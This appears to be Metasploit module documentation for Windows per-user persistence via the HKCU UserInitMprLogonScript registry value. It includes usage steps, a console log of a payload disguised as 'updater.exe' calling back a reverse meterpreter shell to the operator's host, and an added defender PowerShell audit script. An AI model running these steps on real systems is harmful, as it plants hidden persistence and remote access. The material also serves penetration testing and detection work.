Vulnerable Application
Windows Persistence via HKCU UserInitMprLogonScript
This module establishes persistence by leveraging the per-user registry value:
HKCU\Environment\UserInitMprLogonScript
The module writes a payload executable to disk and sets the
UserInitMprLogonScript value so that the payload executes when the user
logs in.
Unlike the traditional Winlogon\Userinit (HKLM) technique, this method:
- Does not require administrative privileges
- Does not modify system-wide registry keys
- Only affects the current user
- Executes during interactive user logon
The payload will execute when the user signs out and logs back in.
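A defender-side audit of the registry value described above, added here as an example that is not part of the module or its documentation. It assumes Windows PowerShell 5 or later on the host being checked; other users' hives are only visible while they are loaded under HKEY_USERS and the script runs elevated.

```powershell
# Added example: report every UserInitMprLogonScript value in the current user's hive
# and in every loaded per-user hive, with the path it would execute at logon.
$valueName = 'UserInitMprLogonScript'

function Get-UserInitLogonScript {
    param([string]$HivePath, [string]$Label)
    $envKey = Join-Path $HivePath 'Environment'
    if (-not (Test-Path -LiteralPath $envKey)) { return }
    $item = Get-ItemProperty -LiteralPath $envKey -Name $valueName -ErrorAction SilentlyContinue
    if ($null -eq $item) { return }            # value absent: nothing to report for this hive
    $target = [string]$item.$valueName
    # Strip quotes and expand %VARS% so the existence check sees the real file path
    $resolved = [Environment]::ExpandEnvironmentVariables($target.Trim('"'))
    [pscustomobject]@{
        User       = $Label
        Key        = $envKey
        Value      = $target
        FileExists = Test-Path -LiteralPath $resolved -PathType Leaf
    }
}

# HKU: is not mapped by default; map it so other loaded hives can be walked
if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
    New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
}

$findings = @(
    Get-UserInitLogonScript -HivePath 'HKCU:\' -Label $env:USERNAME
    # Only real account SIDs (S-1-5-21-...), not _Classes subkeys or well-known SIDs
    Get-ChildItem 'HKU:\' |
        Where-Object { $_.PSChildName -match '^S-1-5-21-\d+-\d+-\d+-\d+$' } |
        ForEach-Object {
            $sid = $_.PSChildName
            try {
                $name = (New-Object System.Security.Principal.SecurityIdentifier($sid)).
                    Translate([System.Security.Principal.NTAccount]).Value
            } catch { $name = $sid }
            Get-UserInitLogonScript -HivePath "HKU:\$sid" -Label $name
        }
)

if ($findings.Count -eq 0) {
    Write-Output "No $valueName value is set in any loaded user hive."
} else {
    # Any hit deserves triage: the value runs whatever it names at each interactive logon.
    $findings | Format-Table -AutoSize
}
```

A hit whose FileExists is False is still worth recording, since the value may be re-pointed at a file dropped later; removing the value with Remove-ItemProperty on the reported key is the corresponding cleanup.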
Verification Steps
- Start `msfconsole`
- Obtain a meterpreter session on a Windows target (user-level is sufficient)
- `use exploit/windows/persistence/userinit_mpr_logon_script`
- `set SESSION <id>`
- `set LHOST <attacker_ip>`
- `set LPORT <attacker_port>`
- `run`
- Sign out from the Windows session
- Log back in
- A new meterpreter session should be created
Options
SESSION (Required)
The session to run this module on.
LHOST (Required)
The local host to receive the reverse connection.
LPORT (Required)
The local port to receive the reverse connection.
PAYLOAD_NAME
The filename to use when writing the payload to disk.
If not specified, a random filename will be generated.
Scenarios
Initial Session
msf > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf exploit(multi/handler) > set LHOST 172.21.176.212
LHOST => 172.21.176.212
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://172.21.176.212:4444
[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Without a database connected that payload UUID tracking will not work!
[*] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Staging x64 payload (233052 bytes) ...
[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (172.21.176.212:4444 -> 172.21.176.1:62359) at 2026-03-01 05:45:19 +0200
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1         meterpreter x64/windows  NERO\DELL @ NERO  172.21.176.212:4444 -> 172.21.176.1:62359 (172.21.176.1)
Install Persistence
msf exploit(multi/handler) > use exploit/windows/persistence/userinit_mpr_logon_script
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/userinit_mpr_logon_script) > set SESSION 1
SESSION => 1
msf exploit(windows/persistence/userinit_mpr_logon_script) > set LHOST 172.21.176.212
LHOST => 172.21.176.212
msf exploit(windows/persistence/userinit_mpr_logon_script) > set LPORT 4444
LPORT => 4444
msf exploit(windows/persistence/userinit_mpr_logon_script) > set PAYLOAD_NAME updater
PAYLOAD_NAME => updater
msf exploit(windows/persistence/userinit_mpr_logon_script) > set WRITABLEDIR C:\\Users\\DELL\\AppData\\Roaming
WRITABLEDIR => C:\Users\DELL\AppData\Roaming
msf exploit(windows/persistence/userinit_mpr_logon_script) > set CleanUpRc true
CleanUpRc => true
msf exploit(windows/persistence/userinit_mpr_logon_script) > set VERBOSE true
VERBOSE => true
msf exploit(windows/persistence/userinit_mpr_logon_script) > check
[+] The target is vulnerable. Registry path is writable
msf exploit(windows/persistence/userinit_mpr_logon_script) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/userinit_mpr_logon_script) >
[-] Handler failed to bind to 172.21.176.212:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Registry path is writable
[+] Writing payload to C:\Users\DELL\AppData\Roaming\updater.exe
[+] Configured HKCU\Environment\UserInitMprLogonScript to execute C:\Users\DELL\AppData\Roaming\updater.exe
[*] Meterpreter-compatible Cleanup RC file: /home/nayera/.msf4/logs/persistence/NERO_20260301.4724/NERO_20260301.4724.rc
jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0   Exploit: windows/persistence/userinit_mpr_logon_script  windows/meterpreter/reverse_tcp  tcp://172.21.176.212:4444 (setting up)
msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0   Exploit: windows/persistence/userinit_mpr_logon_script  windows/meterpreter/reverse_tcp  tcp://172.21.176.212:4444 (setting up)
msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs -K
Stopping all jobs...
msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs
Jobs
====
No active jobs.
msf exploit(windows/persistence/userinit_mpr_logon_script) > use exploit/multi/handler
[*] Using configured payload windows/x64/meterpreter/reverse_https
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf exploit(multi/handler) > set LHOST 172.21.176.212
LHOST => 172.21.176.212
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(multi/handler) >
[*] Started HTTPS reverse handler on https://172.21.176.212:4444
msf exploit(multi/handler) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
1   Exploit: multi/handler  windows/x64/meterpreter/reverse_https  https://172.21.176.212:4444
msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NERO\DELL
meterpreter > sysinfo
Computer : NERO
OS : Windows 11 24H2+ (10.0 Build 26200).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > reg queryval -k HKCU\\Environment -v UserInitMprLogonScript
Key: HKCU\Environment
Name: UserInitMprLogonScript
Type: REG_SZ
Data: C:\Users\DELL\AppData\Roaming\updater.exe
meterpreter > reg setval -k HKCU\\Environment -v testvalue -d test
Successfully set testvalue of REG_SZ.
meterpreter > reg deleteval -k HKCU\\Environment -v testvalue
Successfully deleted testvalue.
meterpreter > ls C:\\Users\\DELL\\AppData\\Roaming\\updater.exe
100777/rwxrwxrwx 7168 fil 2026-03-01 05:47:24 +0200 C:\Users\DELL\AppData\Roaming\updater.exe
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1         meterpreter x64/windows  NERO\DELL @ NERO  172.21.176.212:4444 -> 172.21.176.1:62359 (172.21.176.1)
msf exploit(multi/handler) > sessions -K
[*] Killing all sessions...
[*] 172.21.176.1 - Meterpreter session 1 closed.
msf exploit(multi/handler) > sessions
Active sessions
===============
No active sessions.
msf exploit(multi/handler) >
Log out, and log back in
msf exploit(multi/handler) >
[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Without a database connected that payload UUID tracking will not work!
[*] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Attaching orphaned/stageless session...
[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 2 opened (172.21.176.212:4444 -> 172.21.176.1:65263) at 2026-02-28 07:58:07 +0200